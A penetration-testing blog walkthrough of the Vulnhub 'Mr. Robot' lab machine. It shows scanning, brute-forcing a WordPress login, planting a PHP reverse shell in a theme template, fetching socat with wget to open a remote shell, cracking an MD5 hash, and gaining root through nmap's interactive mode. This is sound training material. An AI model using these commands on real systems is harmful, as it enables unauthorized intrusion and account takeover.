Pentesting · Vulnhub

Mr. Robot – OSCP-Like Vulnhub Walkthrough


Machine link:,151/

This machine is based on the show Mr. Robot, and according to this post, it’s quite similar to OSCP boxes and intermediate level.

Our goal is to grab all of the 3 hidden keys, so let’s get going!

Table of Contents

First off I found its IP with netdiscover:

root@kali:~/Vulnhub/MrRobot# netdiscover -r

Currently scanning: | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
 IP At MAC Address Count Len MAC Vendor / Hostname
 ----------------------------------------------------------------------------- 52:54:00:12:35:00 1 60 Unknown vendor 52:54:00:12:35:00 1 60 Unknown vendor 08:00:27:0e:fa:9c 1 60 PCS Systemtechnik GmbH 08:00:27:2b:8f:ee 1 60 PCS Systemtechnik GmbH

Since the first 3 refer to VirtualBox, the IP of the machine is

Port Scanning

Now it’s time to scan for open ports with nmap:

root@kali:~/Vulnhub/MrRobot# nmap -p- -sV -sC -sS -v -T5 -oN nmap.results

Not shown: 65532 filtered ports
 22/tcp closed ssh
 80/tcp open http Apache httpd
 |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 |_http-server-header: Apache
 |_http-title: Site doesn't have a title (text/html).
 443/tcp open ssl/http Apache httpd
 |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
 | http-methods:
 |_ Supported Methods: GET HEAD POST OPTIONS
 |_http-server-header: Apache
 |_http-title: Site doesn't have a title (text/html).
 | ssl-cert: Subject:
 | Issuer:
 | Public Key type: rsa
 | Public Key bits: 1024
 | Signature Algorithm: sha1WithRSAEncryption
 | Not valid before: 2015-09-16T10:45:03
 | Not valid after: 2025-09-13T10:45:03
 | MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
 |_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b

Port 22 is the only one that shows closed, which means that it probably has some protection mechanism closing the connection to it, perhaps a firewall restriction.

Let’s ignore that for now and focus on the Apache server.


Since I didn’t find interesting stuff on the website, decided to look at the robots.txt:



Voila! Got the first flag! And /fsocity.dic contains a 6.9MB wordlist, perhaps this will help in some brute forcing later 😉.

Now let’s dig for more folders and files with DirBuster:


After letting it scan for a while, I noticed that the directories were indicative of a WordPress blog.


Even though the root of the website doesn’t lead to a WP blog, I decided to run wpscan to try and grab its users.

root@kali:~/Vulnhub/MrRobot# wpscan --url --enumerate u
 __ _______ _____ 
 \ \ / / __ \ / ____| 
 \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ 
 \ /\ / | | ____) | (__| (_| | | | |
 \/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team 
 Version 2.9.3
 Sponsored by Sucuri -
 @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

[+] URL:
[+] Started: Mon Feb 12 20:08:55 2018

[+] robots.txt available under: ''
[!] The WordPress '' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED:
[+] XML-RPC Interface available under:

[+] WordPress version 4.3.15 (Released on 2018-01-16) identified from rss generator, rdf generator, atom generator, links opml
[!] 1 vulnerability identified from the version number

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] We did not enumerate any usernames

Hmm… It failed…

After looking through the dirbuster log, I didn’t find anything that could give useful information but I remembered we have a wordlist and that there’s a particular thing about the WordPress login…

That is when you try to login with a non-existent user like “asdasd”, this happens:


However, when you login with a user that exists(and I just guessed it by the series):


Yupi! As you can see, it gave a different message on elliot, which means that elliot is a valid user.

But I just guessed it because I knew the show, I thought maybe this machine was intended to be solvable by anyone, so I tried to see if elliot was in that wordlist:

root@kali:~/Vulnhub/MrRobot# cat fsocity.dic | grep elliot

Oh boy! Indeed it was and duplicated a lot, I think now our goal is to brute force the elliot user, however, before doing so I decided to remove the duplicates since that will speed up the process.

After a quick google found this command:

root@kali:~/Vulnhub/MrRobot# sort fsocity.dic | uniq > unique.dic

Let’s check if it worked by seeing if elliot is still present:

root@kali:~/Vulnhub/MrRobot# cat unique.dic | grep elliot

Gaining Access

Looks like we’re ready to hit it with brute force since it is WordPress we can just use wpscan (however hydra tends to be faster).

root@kali:~/Vulnhub/MrRobot# wpscan --url --wordlist ~/Vulnhub/MrRobot/unique.dic --threads 50 --username elliot
[+] Starting the password brute forcer
[+] [SUCCESS] Login : elliot Password : ER28-0652

Brute Forcing 'elliot' Time: 00:01:25  (4040 / 11452) 35.27% ETA: 00:02:37
| Id | Login | Name   | Password |
|    | elliot |      | ER28-0652 |

Bam! Got a WordPress login.

Series reference: after a quick google search, I found that’s his employee number.


Looking at this panel, there’s just one thing that comes to my mind: easy reverse shell.

There are a couple of ways to do this, my way is going to Appearance->Editor then prepending the pentestmonkey’s php-reverse-shell script to the 404 template.


Now save and start a netcat listener on our kali machine:

root@kali:~/Vulnhub/MrRobot# nc -vlp 1234
listening on [any] 1234 ...

So now we force a 404.


root@kali:~/Vulnhub/MrRobot# nc -vlp 1234
listening on [any] 1234 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 33816
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 01:52:17 up 2:03, 0 users, load average: 0.00, 0.08, 0.23
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Feeling l33t already?

Getting a fully TTY shell

Well not yet, whenever I get a shell I try to make it fully interactive(with CTRL+C working, etc…).

Following method 2 of ropnop’s, I begin to get socat on the remote machine.

For this, I use Python’s SimpleHTTPServer:

root@kali:~/Vulnhub/MrRobot/http# ls
root@kali:~/Vulnhub/MrRobot/http# python -m SimpleHTTPServer
Serving HTTP on port 8000 ...

Now on the Mr. Robot machine:

$ cd /tmp
$ ls
$ wget
--2018-02-13 02:10:29--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: 'socat'

0K .......... .......... .......... .......... .......... 13% 1.80M 0s
50K .......... .......... .......... .......... .......... 27% 24.5M 0s
100K .......... .......... .......... .......... .......... 40% 29.3M 0s
150K .......... .......... .......... .......... .......... 54% 42.3M 0s
200K .......... .......... .......... .......... .......... 68% 4.47M 0s
250K .......... .......... .......... .......... .......... 81% 51.8M 0s
300K .......... .......... .......... .......... .......... 95% 315M 0s
350K .......... ...... 100% 366M=0.04s

2018-02-13 02:10:29 (8.13 MB/s) - 'socat' saved [375176/375176]

Now it’s time to make it shine, on our machine we set up the listener:

root@kali:~/Vulnhub/MrRobot/http# socat file:`tty`,raw,echo=0 tcp-listen:4444

Then, on the remote machine, we make it executable and execute it:

$ chmod +x socat; ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

And here we go with a full TTY :

root@kali:~/Vulnhub/MrRobot/http# socat file:`tty`,raw,echo=0 tcp-listen:4444

Privilege escalation to user robot

Now let’s see what the home directory brings us:

daemon@linux:/tmp$ ls /home
daemon@linux:/tmp$ ls /home
daemon@linux:/tmp$ cd /home/robot
daemon@linux:/home/robot$ ls
key-2-of-3.txt password.raw-md5

Okay, we got the seco…

daemon@linux:/home/robot$ cat key-2-of-3.txt 
cat: key-2-of-3.txt: Permission denied

Huh… Ups, not yet!

daemon@linux:/home/robot$ ls -lah
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5

Looks like we need to change to the robot user.

Peeking into that password.raw-md5 file:

daemon@linux:/home/robot$ cat password.raw-md5 

Sniff sniff… Smells like a password cracking phase!

Let’s fire off hashcat with the rockyou.txt wordlist:

C:\Users\AdvSpyL3n\Documents\hashcat (master)
λ hashcat64 -m 0 -a 0 c3fcd3d76192e4007dfb496cca67e13b wordlists\rockyou.txt

Ran it on my Windows machine since it used my GPU’s full potential and in a matter of seconds, I got the password: abcdefghijklmnopqrstuvwxyz.

Now we can change to robot and get the second flag:

daemon@linux:/home/robot$ su robot
robot@linux:~$ ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt

Privilege Escalation to root

After using the script and analyzing its output, I thought about looking for a SUID/SGID.

For that we run this command(as shown in g0tmi1k’s blog):

robot@linux:/tmp$ find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

I was expecting a binary made by the maker of the challenge so I tried to look for other bunny holes…

After a while, I decided to ask a friend who had done the challenge for a hint and apparently it was in the SUID on nmap, since this has an interactive mode we can use it to spawn a shell.

robot@linux:/tmp$ /usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# cd /root# cd /root
# ls
firstboot_done key-3-of-3.txt
# cat firstboot_done
# ls -lah
total 32K
drwx------  3 root root 4.0K Nov 13  2015 .
drwxr-xr-x 22 root root 4.0K Sep 16  2015 ..
-rw-------  1 root root 4.0K Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3.2K Sep 16  2015 .bashrc
drwx------  2 root root 4.0K Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1.0K Sep 16  2015 .rnd
# cat key-3-of-3.txt

Didn’t really like having to get a spoil on the privilege escalation but hey we got it and overall I enjoyed the challenge.



Remember the port 22 being shown as closed?

My initial thought was that there would be a “protection mechanism”, I was thinking of something like we would need to somehow authenticate somewhere for that to be open.

Well turns out that it simply was a firewall, named ufw, that serves as a front-end for Linux’s netfilter firewall.

I checked this by running:

# iptables -L

Chain ufw-user-input (1 references)
target prot opt source destination 
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh

Now one would think that it is strange that it’s accepting and the port is not open, however when we see the ports used by the processes:

# netstat -natp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0* LISTEN 933/vsftpd 
tcp 0 0* LISTEN 1674/monit 
tcp 0 0* LISTEN 1473/mysqld.bin 
tcp 0 0 ESTABLISHED 1775/php-fpm: pool 
tcp6 0 0 :::443 :::* LISTEN 1523/httpd.bin 
tcp6 0 0 :::80 :::* LISTEN 1523/httpd.bin 
tcp6 0 0 TIME_WAIT -

We see there’s no service on port 22, thus leaving Linux giving an RST tcp packet, the one used when a port is closed.

A pretty strange configuration but interesting enough to put me looking into it :).

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s